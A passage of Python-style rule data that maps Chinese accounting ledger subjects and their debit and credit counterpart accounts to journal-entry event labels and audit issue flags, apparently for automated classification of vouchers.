{\"opposite\":[\"无形资产\"],\"event\":\"处置无形资产\",\"problem\":None},\n ],\n \"credit_only_one\":True,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"无形资产减值准备增加\",\"problem\":\"无形资产减值准备增加\"},\n ]},\n{\"no\":8,\"subject\":\"长期股权投资\",\"debit_only_one\":False,\"debit\":\n [\n {\"opposite\":[\"银行存款\"],\"event\":\"股权投资-货币资金\",\"problem\":None},\n {\"opposite\":[\"银行存款\",\"营业外收入\"],\"event\":\"股权投资-货币资金,权益法下初始投资成本小于应享有的被投资单位可辨认净资产公允价值份额部分\",\"problem\":None},\n {\"opposite\":[\"银行存款\",\"资本公积\"],\"event\":\"股权投资-货币资金,同一控制下合并取得的股权投资\",\"problem\":None},\n {\"opposite\":[\"银行存款\",\"固定资产\",\"无形资产\",\"营业外收入\",\"资本公积\",\"其他应收款\",\"其他应付款\"],\"event\":\"股权投资-包含其他资产或负债\",\"problem\":None},\n {\"opposite\":[\"银行存款\",\"交易性金融资产\",\"其他权益工具投资\",\"可供出售金融资产\"],\"event\":\"股权投资-金融资产转为股权投资\",\"problem\":None},\n {\"opposite\":[\"股本\",\"资本公积\"],\"event\":\"股权投资-发行权益性债券\",\"problem\":None},\n {\"opposite\":[\"投资收益\"],\"event\":\"股权投资-权益法下确认投资收益\",\"problem\":None},\n {\"opposite\":[\"其他综合收益\",\"资本公积-其他资本公积\"],\"event\":\"股权投资-其他权益变动\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":[\"应收股利\"],\"event\":\"确认联营企业或合营企业股利\",\"problem\":None},\n {\"opposite\":[\"银行存款\"],\"event\":\"处置长期股权投资\",\"problem\":None},\n ],\n \"two_way\":[\n {\"keywords\": 
[\"增资\",\"权益法转为成本法\",\"增加投资\"],\"contain_event\":\"权益法转为成本法核算\",\"problem\": None},\n {\"keywords\": [\"减资\",\"成本法转为权益法\",\"处置投资\"],\"contain_event\":\"成本法转为权益法核算\",\"problem\": None},\n ]\n },\n\n{\"no\":40,\"subject\":\"固定资产\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": [\"在建工程\"], \"event\": \"在建工程转入固定资产\", \"problem\": None},\n {\"opposite\": [\"库存现金\",\"银行存款\",\"应付账款\",\"预付款项\",\"其他应付款\",\"其他应收款\",\"长期应付款\"], \"event\": \"购入固定资产\", \"problem\": None},\n {\"opposite\": [\"股本\",\"资本公积\"], \"event\": \"股东投入的固定资产\", \"problem\": None},\n {\"opposite\": [\"累计折旧\", \"投资性房地产\"], \"event\": \"投资性房地产转入固定资产-成本核算\", \"problem\": None},\n {\"opposite\": [\"公允价值变动损益\", \"投资性房地产\"], \"event\": \"投资性房地产转入固定资产-公允价值核算\", \"problem\": None},\n {\"opposite\": \"all\", \"event\": \"固定资产增加\", \"problem\": \"固定资产增加\"},\n\n],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\": [\"库存现金\",\"银行存款\",\"应付账款\",\"预付款项\",\"其他应付款\",\"其他应收款\",\"长期应付款\"], \"event\": \"退回固定资产\", \"problem\": None},\n {\"opposite\": [\"应交税费\"], \"event\": \"固定资产进项税冲减固定资产原值\", \"problem\":None},\n {\"opposite\":[\"累计折旧\",\"投资性房地产\"],\"event\":\"固定资产转入投资性房地产\",\"problem\":None},\n {\"opposite\":[\"累计折旧\",\"固定资产清理\"],\"event\":\"固定资产转入清理\",\"problem\":None},\n {\"opposite\":monetary_funds,\"event\":\"处置固定资产收到货币资金\",\"problem\":\"固定资产处置建议通过固定资产清理科目核算\"},\n {\"opposite\":\"all\",\"event\":\"固定资产减少\",\"problem\":\"固定资产减少\"},\n\n ]},\n{\"no\": 40, \"subject\": \"租赁负债\", \"debit_only_one\": False,\n \"debit\": [\n {\"opposite\": monetary_funds, \"event\": \"支付租赁负债\", \"problem\": None},\n\n ],\n \"credit_only_one\": False,\n \"credit\": [\n {\"opposite\": [\"使用权资产\"], \"event\": \"租赁增加使用权资产\", \"problem\": None},\n\n ]},\n{\"no\":40,\"subject\":\"使用权资产\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": [\"库存现金\",\"银行存款\",\"租赁负债\"], \"event\": \"租赁增加使用权资产\", \"problem\": None},\n\n],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"使用权资产减少\",\"problem\":\"使用权资产减少\"},\n\n ]},\n{\"no\":40,\"subject\":\"无形资产\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": [\"开发支出\"], \"event\": \"开发支出转入无形资产\", \"problem\": None},\n {\"opposite\": [\"库存现金\",\"银行存款\",\"应付账款\",\"其他应付款\",\"其他应收款\",\"长期应付款\"], \"event\": \"购入无形资产\", \"problem\": None},\n {\"opposite\": [\"股本\",\"资本公积\"], \"event\": \"股东投入的无形资产\", \"problem\": None},\n {\"opposite\": [\"累计摊销\", \"投资性房地产\"], \"event\": \"投资性房地产转入无形资产-成本核算\", \"problem\": None},\n {\"opposite\": [\"公允价值变动损益\", \"投资性房地产\"], \"event\": \"投资性房地产转入无形资产-公允价值核算\", \"problem\": None},\n\n],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":[\"累计摊销\",\"投资性房地产\"],\"event\":\"无形资产转入投资性房地产\",\"problem\":None},\n {\"opposite\": [\"银行存款\", \"累计摊销\", \"无形资产减值准备\", \"其他应收款\"], \"event\": \"处置无形资产\", \"problem\": None},\n {\"opposite\": [\"管理费用\"], \"event\": \"无形资产摊销未经过累计摊销直接计入管理费用\", \"problem\": \"无形资产摊销未经过累计摊销直接计入管理费用\"},\n ]},\n{\"no\":41,\"subject\":\"投资性房地产\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": [\"公允价值变动损益\"], \"event\": \"投资性房地产公允价值变动\", \"problem\": None},\n {\"opposite\": [\"开发产品\",\"公允价值变动损益\",\"其他综合收益\"], \"event\": \"存货转换为投资性房地产\", \"problem\": None},\n {\"opposite\": [\"在建工程\"], \"event\": \"在建工程车转换为投资性房地产\", \"problem\": None},\n {\"opposite\": monetary_funds, \"event\": \"现金购买投资性房地产\", \"problem\": None},\n {\"opposite\": [\"应付账款\",\"其他应付款\",\"长期应付款\"], \"event\": \"欠款购买投资性房地产\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n 
{\"opposite\":[\"开发产品\",\"投资性房地产累计折旧\",\"投资性房地产累计摊销\",\"公允价值变动损益\"],\"event\":\"投资性房地产转为存货\",\"problem\":None},\n {\"opposite\":[\"其他业务成本\",\"主营业务成本\"],\"event\":\"处置投资性房地产\",\"problem\":None},\n ]},\n{\"no\":11,\"subject\":\"开发支出\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"开发支出增加\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":[\"管理费用\"],\"event\":\"开发支出转为管理费用\",\"problem\":\"开发支出-费用化支出应转入研发费用科目\"},\n ]},\n{\"no\":11,\"subject\":\"长期待摊费用\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"长期待摊费用增加\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"长期待摊费用摊销或减少\",\"problem\":None},\n ]},\n{\"no\":9,\"subject\":\"投资性房地产累计折旧\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"投资性房地产累计折旧减少\",\"problem\":\"投资性房地产累计折旧减少\"},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":operating_cost,\"event\":\"计提投资性房地产折旧\",\"problem\":None},\n ]},\n{\"no\":9,\"subject\":\"累计折旧\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"累计折旧减少\",\"problem\":\"累计折旧减少\"},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"计提折旧\",\"problem\":None},\n ]},\n{\"no\":9,\"subject\":\"使用权资产累计折旧\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"使用权资产累计折旧减少\",\"problem\":\"使用权资产累计折旧减少\"},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"计提使用权资产折旧\",\"problem\":None},\n ]},\n{\"no\":10,\"subject\":\"累计摊销\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"累计摊销减少\",\"problem\":\"累计摊销减少\"},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"无形资产摊销\",\"problem\":None},\n ]},\n\n{\"no\":12,\"subject\":\"其他收益\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"冲减其他收益\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":[\"财务费用\"],\"event\":\"政府补助-其他收益-冲减借款费用\",\"problem\":None},\n {\"opposite\":[\"银行存款\"],\"event\":\"政府补助-其他收益-收到货币资金\",\"problem\":None},\n {\"opposite\":[\"递延收益\"],\"event\":\"政府补助-其他收益-递延收益摊销\",\"problem\":None},\n ]},\n{\"no\":13,\"subject\":\"营业外收入\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"冲减营业外收入\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":\n {\"keywords\": government_grants,\n \"contain_event\": [\n {\"opposite\":[\"财务费用\"],\"event\":\"政府补助-营业外收入-冲减借款费用\",\"problem\":None},\n {\"opposite\":[\"银行存款\"],\"event\":\"政府补助-营业外收入-收到货币资金\",\"problem\":None},\n {\"opposite\":[\"递延收益\"],\"event\":\"政府补助-营业外收入-递延收益摊销\",\"problem\":None},\n ],\n \"not_contain_event\": \"确认营业外收入-非政府补助项目\"}\n },\n{\"no\":14,\"subject\":\"递延收益\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"递延收益摊销\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":monetary_funds,\"event\":\"递延收益-收到政府补助-货币资金\",\"problem\":None},\n {\"opposite\":\"all\",\"event\":\"递延收益-收到政府补助-非货币资金\",\"problem\":\"递延收益-收到政府补助-非货币资金\"},\n ]},\n{\"no\":18,\"subject\":\"财务费用\",\"debit_only_one\":False,\n\"debit\":\n [\n {\"keywords\": [\"融资费用\"],\"contain_event\":\"财务费用-未确认融资费用\",\"problem\": None},\n {\"keywords\": [\"融资收益\"],\"contain_event\":\"财务费用-未实现融资收益\",\"problem\": None},\n {\"keywords\": [\"租赁负债\"],\"contain_event\":\"财务费用-租赁负债利息\",\"problem\": None},\n {\"keywords\": [\"资金占用\"],\"contain_event\":\"财务费用-资金占用费\",\"problem\": 
\"资金占用费收入建议计入其他业务收入或投资收益\"},\n {\"keywords\": [\"利息收入\",\"收到利息\"],\"contain_event\":\"财务费用-利息收入\",\"problem\": None},\n {\"keywords\": [\"利息支出\",\"支付利息\"],\"contain_event\":\"财务费用-利息支出\",\"problem\": None},\n {\"keywords\": bank_charges_desc,\"contain_event\":\"财务费用-手续费\",\"problem\": None},\n {\"keywords\": exchange_desc,\"contain_event\":\"财务费用-汇兑损益\",\"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":\n [\n {\"keywords\": [\"融资费用\"],\"contain_event\":\"财务费用-冲减未确认融资费用\",\"problem\": None},\n {\"keywords\": [\"融资收益\"],\"contain_event\":\"财务费用-冲减未实现融资收益\",\"problem\": None},\n {\"keywords\": [\"租赁负债\"],\"contain_event\":\"财务费用-冲减租赁负债利息\",\"problem\": None},\n {\"keywords\": [\"资金占用\"],\"contain_event\":\"财务费用-冲减资金占用费\",\"problem\": \"资金占用费收入建议计入其他业务收入或投资收益\"},\n {\"keywords\": [\"利息收入\",\"收到利息\"],\"contain_event\":\"财务费用-冲减利息收入\",\"problem\": None},\n {\"keywords\": [\"利息支出\",\"支付利息\"],\"contain_event\":\"财务费用-冲减利息支出\",\"problem\": None},\n {\"keywords\": bank_charges_desc,\"contain_event\":\"财务费用-冲减手续费\",\"problem\": None},\n {\"keywords\": exchange_desc,\"contain_event\":\"财务费用-冲减汇兑损益\",\"problem\": None}\n ],\n },\n{\"no\":15,\"subject\":\"应付利息\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":monetary_funds,\"event\":\"支付应付利息\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"确认应付利息\",\"problem\":None},\n ]},\n\n\n{\"no\":17,\"subject\":\"应付债券\",\"debit_only_one\":False,\n\"debit\":\n {\"keywords\": bonds_payable_interest,\n \"contain_event\": [\n {\"opposite\":monetary_funds,\"event\":\"归还应付债券本金和利息\",\"problem\":None},\n ],\n \"not_contain_event\": \"偿还应付债券\",\n },\n \"credit_only_one\":False,\n \"credit\":\n {\"keywords\": bonds_payable_interest,\n \"contain_event\": [\n {\"opposite\":interest_collection_subjects,\"event\":\"计提债券利息\",\"problem\":None},\n ],\n \"not_contain_event\": [\n {\"opposite\":monetary_funds,\"event\":\"发行债券收到现金\",\"problem\":None},\n ],\n }\n },\n{\"no\":15,\"subject\":\"其他权益工具\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":monetary_funds,\"event\":\"发行其他权益工具\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n\n {\"opposite\":monetary_funds,\"event\":\"现金赎回其他权益工具\",\"problem\":None},\n {\"opposite\":[\"银行存款\",\"库存股\"],\"event\":\"回购股票赎回其他权益工具\",\"problem\":None},\n {\"opposite\":[\"股本\",\"资本公积\",\"银行存款\",\"库存股\"],\"event\":\"其他权益工具转为股本\",\"problem\":None},\n {\"opposite\":[\"应付债券\"],\"event\":\"其他权益工具转为应付债券\",\"problem\":None},\n ]},\n{\"no\":15,\"subject\":\"库存股\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":monetary_funds,\"event\":\"回购公司股份\",\"problem\":None},\n {\"opposite\":[*monetary_funds,\"资本公积\"],\"event\":\"可能为以权益结算的股份支付\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":[\"股本\",\"资本公积\",\"盈余公积\",\"利润分配\"],\"event\":\"注销库存股\",\"problem\":None},\n {\"opposite\":[*monetary_funds,\"资本公积\",\"盈余公积\",\"利润分配\"],\"event\":\"转让库存股\",\"problem\":None},\n ]},\n{\"no\":16,\"subject\":\"应收利息\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"确认应收利息\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":monetary_funds,\"event\":\"收到利息收入\",\"problem\":None},\n ]},\n\n\n{\"no\":16,\"subject\":\"交易性金融资产\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":[\"公允价值变动损益\"],\"event\":\"确认交易性金融资产公允价值变动\",\"problem\":None},\n {\"opposite\":monetary_funds,\"event\":\"购买交易性金融资产\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n 
{\"opposite\":[\"公允价值变动损益\"],\"event\":\"确认交易性金融资产公允价值变动\",\"problem\":None},\n {\"opposite\":[*monetary_funds,\"投资收益\",\"公允价值变动损益\"],\"event\":\"处置交易性金融资产\",\"problem\":None},\n ],\n },\n{\"no\":16,\"subject\":\"交易性金融负债\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":[\"公允价值变动损益\"],\"event\":\"确认交易性金融负债公允价值变动\",\"problem\":None},\n {\"opposite\":[*monetary_funds,\"投资收益\",\"公允价值变动损益\"],\"event\":\"处置交易性金融负债\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":[*monetary_funds,\"投资收益\"],\"event\":\"确认交易性金融负债\",\"problem\":None},\n {\"opposite\":[\"公允价值变动损益\"],\"event\":\"确认交易性金融负债公允价值变动\",\"problem\":None},\n ],\n },\n{\"no\":16,\"subject\":\"以公允价值计量且其变动计入当期损益的金融资产\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": [\"公允价值变动损益\"], \"event\": \"确认以公允价值计量且其变动计入当期损益的金融资产公允价值变动\", \"problem\": \"新准则更名为交易性金融资产\"},\n {\"opposite\": monetary_funds, \"event\": \"购买以公允价值计量且其变动计入当期损益的金融资产\", \"problem\": \"新准则更名为交易性金融资产\"},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\": [*monetary_funds, \"投资收益\"], \"event\": \"处置以公允价值计量且其变动计入当期损益的金融资产\", \"problem\": \"新准则更名为交易性金融资产\"},\n {\"opposite\": [\"公允价值变动损益\"], \"event\": \"确认以公允价值计量且其变动计入当期损益的金融资产公允价值变动\", \"problem\": \"新准则更名为交易性金融资产\"},\n ],\n },\n{\"no\":16,\"subject\":\"以公允价值计量且其变动计入当期损益的金融负债\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":[\"公允价值变动损益\"],\"event\":\"确认以公允价值计量且其变动计入当期损益的金融负债公允价值变动\",\"problem\":\"新准则更名为交易性金融负债\"},\n {\"opposite\":[*monetary_funds,\"投资收益\",\"公允价值变动损益\"],\"event\":\"处置以公允价值计量且其变动计入当期损益的金融负债\",\"problem\":\"新准则更名为交易性金融负债\"},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":[*monetary_funds,\"投资收益\"],\"event\":\"确认以公允价值计量且其变动计入当期损益的金融负债\",\"problem\":\"新准则更名为交易性金融负债\"},\n {\"opposite\":[\"公允价值变动损益\"],\"event\":\"确认以公允价值计量且其变动计入当期损益的金融负债公允价值变动\",\"problem\":\"新准则更名为交易性金融负债\"},\n ],\n },\n{\"no\":16,\"subject\":\"投资收益\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"投资收益在借方\",\"problem\":\"投资收益在借方\"},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"确认投资收益\",\"problem\":None},\n ]},\n{\"no\":16,\"subject\":\"公允价值变动损益\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"公允价值变动损益在借方\",\"problem\":\"公允价值变动损益在借方\"},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"确认公允价值变动损益\",\"problem\":None},\n ]},\n{\"no\":16,\"subject\":\"持有至到期投资\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"购买持有至到期投资\",\"problem\":\"新金融准则分类为债权投资\"},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"持有至到期投资减少\",\"problem\":\"持有至到期投资减少\"},\n ],\n\"two_way\":[\n {\"keywords\": [\"购买\",\"购入\"],\"contain_event\":\"购买持有至到期投资\",\"problem\": \"新金融准则分类为债权投资\"},\n ]\n },\n{\"no\":16,\"subject\":\"债权投资\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"购买债权投资\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"债权投资减少\",\"problem\":\"债权投资减少\"},\n\n ],\n\"two_way\":[\n {\"keywords\": [\"购买\",\"购入\"],\"contain_event\":\"购买债权投资\",\"problem\": None},\n {\"keywords\": [\"处置\",\"出售\"],\"contain_event\":\"处置债权投资\",\"problem\": None},\n ]\n },\n{\"no\":16,\"subject\":\"可供出售金融资产\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":monetary_funds,\"event\":\"购买可供出售金融资产\",\"problem\":\"新金融工具准则中可供出售金融资产分类为其他债权工具、其他权益工具投资或交易性金融资产\"},\n 
{\"opposite\":[\"其他综合收益\"],\"event\":\"可供出售金融资产公允价值变动调整\",\"problem\":\"新金融工具准则中可供出售金融资产分类为其他债权工具、其他权益工具投资或交易性金融资产\"},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":[\"其他综合收益\"],\"event\":\"可供出售金融资产公允价值变动调整\",\"problem\":\"新金融工具准则中可供出售金融资产分类为其他债权工具、其他权益工具投资或交易性金融资产\"},\n ],\n\"two_way\":[\n {\"keywords\": [\"购买\",\"购入\"],\"contain_event\":\"购买可供出售金融资产\",\"problem\": \"新金融工具准则中可供出售金融资产分类为其他债权工具、其他权益工具投资或交易性金融资产\"},\n {\"keywords\": [\"处置\",\"出售\"],\"contain_event\":\"处置可供出售金融资产\",\"problem\": \"新金融工具准则中可供出售金融资产分类为其他债权工具、其他权益工具投资或交易性金融资产\"},\n ]\n },\n{\"no\":16,\"subject\":\"其他债权投资\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":monetary_funds,\"event\":\"购买其他债权投资\",\"problem\":None},\n {\"opposite\":[\"其他综合收益\"],\"event\":\"其他债权投资公允价值变动调整\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":[\"其他综合收益\"],\"event\":\"其他债权投资公允价值变动调整\",\"problem\":None},\n ],\n\"two_way\":[\n {\"keywords\": [\"购买\",\"购入\"],\"contain_event\":\"购买其他债权投资\",\"problem\": None},\n {\"keywords\": [\"处置\",\"出售\"],\"contain_event\":\"处置其他债权投资\",\"problem\": None},\n ]\n },\n{\"no\":16,\"subject\":\"其他权益工具投资\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":monetary_funds,\"event\":\"其他权益工具投资\",\"problem\":None},\n {\"opposite\":[\"其他综合收益\"],\"event\":\"其他权益工具投资公允价值变动调整\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":[\"其他综合收益\"],\"event\":\"其他权益工具投资公允价值变动调整\",\"problem\":None},\n ],\n\"two_way\":[\n {\"keywords\": [\"购买\",\"购入\"],\"contain_event\":\"购买其他权益工具投资\",\"problem\": None},\n {\"keywords\": [\"处置\",\"出售\"],\"contain_event\":\"处置其他权益工具投资\",\"problem\": None},\n ]\n },\n{\"no\":16,\"subject\":\"其他综合收益\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":[\"盈余公积\",\"利润分配\"],\"event\":\"其他综合收益转入留存收益\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"其他综合收益增加\",\"problem\":\"其他综合收益增加\"},\n ],\n },\n\n{\"no\":19,\"subject\":\"税金及附加\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":[\"应交税费\"],\"event\":\"计提税金及附加\",\"problem\":None},\n {\"opposite\":monetary_funds,\"event\":\"支付税金及附加\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"冲减税金及附加\",\"problem\":None},\n ]},\n{\"no\":20,\"subject\":\"应付职工薪酬\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"支付职工薪酬\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"计提职工薪酬\",\"problem\":None},\n ]},\n\n{\"no\":22,\"subject\":\"信用减值损失\",\"debit_only_one\":True,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"计提信用减值损失\",\"problem\":None},\n ],\n \"credit_only_one\":True,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"冲减信用减值损失\",\"problem\":\"冲减信用减值损失\"},\n ]},\n{\"no\":23,\"subject\":\"所得税费用\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":[\"应交税费\"],\"event\":\"计提所得税\",\"problem\":None},\n {\"opposite\":[\"银行存款\"],\"event\":\"支付所得税\",\"problem\":None},\n {\"opposite\":[\"递延所得税资产\",\"递延所得税负债\"],\"event\":\"确认递延所得税费用\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\": [\"应交税费\"], \"event\": \"冲减多计提所得税\", \"problem\": None},\n {\"opposite\": [\"银行存款\"], \"event\": \"收到所得税退款\", \"problem\": None},\n {\"opposite\": [\"递延所得税资产\", \"递延所得税负债\"], \"event\": \"冲减递延所得税费用\", \"problem\": None},\n ]},\n{\"no\":23,\"subject\":\"递延所得税资产\",\"debit_only_one\":False,\n\"debit\":[\n 
{\"opposite\":\"all\",\"event\":\"递延所得税资产增加\",\"problem\":\"递延所得税资产增加\"},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"递延所得税资产减少\",\"problem\":\"递延所得税资产减少\"},\n ]},\n{\"no\":23,\"subject\":\"递延所得税负债\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"递延所得税负减少\",\"problem\":\"递延所得税负减少\"},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"递延所得税负债增加\",\"problem\":\"递延所得税负债增加\"},\n ]},\n{\"no\":24,\"subject\":\"资产处置收益\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"资产处置损失\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"资产处置收益\",\"problem\":None},\n ]},\n{\"no\":25,\"subject\":\"营业外收入\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"冲减营业外收入\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":monetary_funds,\"event\":\"营业外收入-收到货币资金\",\"problem\":None},\n {\"opposite\":\"all\",\"event\":\"营业外收入-未收到货币资金\",\"problem\":None},\n ]},\n\n{\"no\":26,\"subject\":\"营业外支出\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":monetary_funds,\"event\":\"营业外支出-支付货币资金\",\"problem\":None},\n {\"opposite\":\"all\",\"event\":\"营业外支出-非支付货币资金\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"冲减营业外支出\",\"problem\":None},\n ]},\n{\"no\":27,\"subject\":\"短期借款\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"偿还短期借款\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"取得短期借款\",\"problem\":None},\n ]},\n{\"no\":27,\"subject\":\"长期借款\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"偿还长期借款\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"取得长期借款\",\"problem\":None},\n ]},\n{\"no\":28,\"subject\":\"应付股利\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\":\"all\",\"event\":\"支付应付股利\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"计提应付股利\",\"problem\":None},\n ]},\n{\"no\":29,\"subject\":\"盈余公积\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": [\"股本\", \"资本公积\"], \"event\": \"盈余公积转增资本\", \"problem\": None},\n {\"opposite\": [\"利润分配\"], \"event\": \"盈余公积弥补亏损\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"提取盈余公积\",\"problem\":None},\n ]},\n{\"no\":30,\"subject\":\"一般风险准备\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": [\"利润分配\"], \"event\": \"一般风险准备弥补亏损\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"提取一般风险准备\",\"problem\":None},\n ]},\n{\"no\":31,\"subject\":\"专项储备\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": \"all\", \"event\": \"冲减专项储备\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"提取专项储备\",\"problem\":None},\n ]},\n{\"no\":32,\"subject\":\"利润分配\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": monetary_funds, \"event\": \"使用货币资金进行利润分配\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":[\"股本\",\"资本公积\"],\"event\":\"未分配利润转增股本\",\"problem\":None},\n ]},\n{\"no\":33,\"subject\":\"股本\",\"debit_only_one\":False,\n\"debit\":[\n {\"opposite\": \"all\", \"event\": \"股本减少\", \"problem\": None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n 
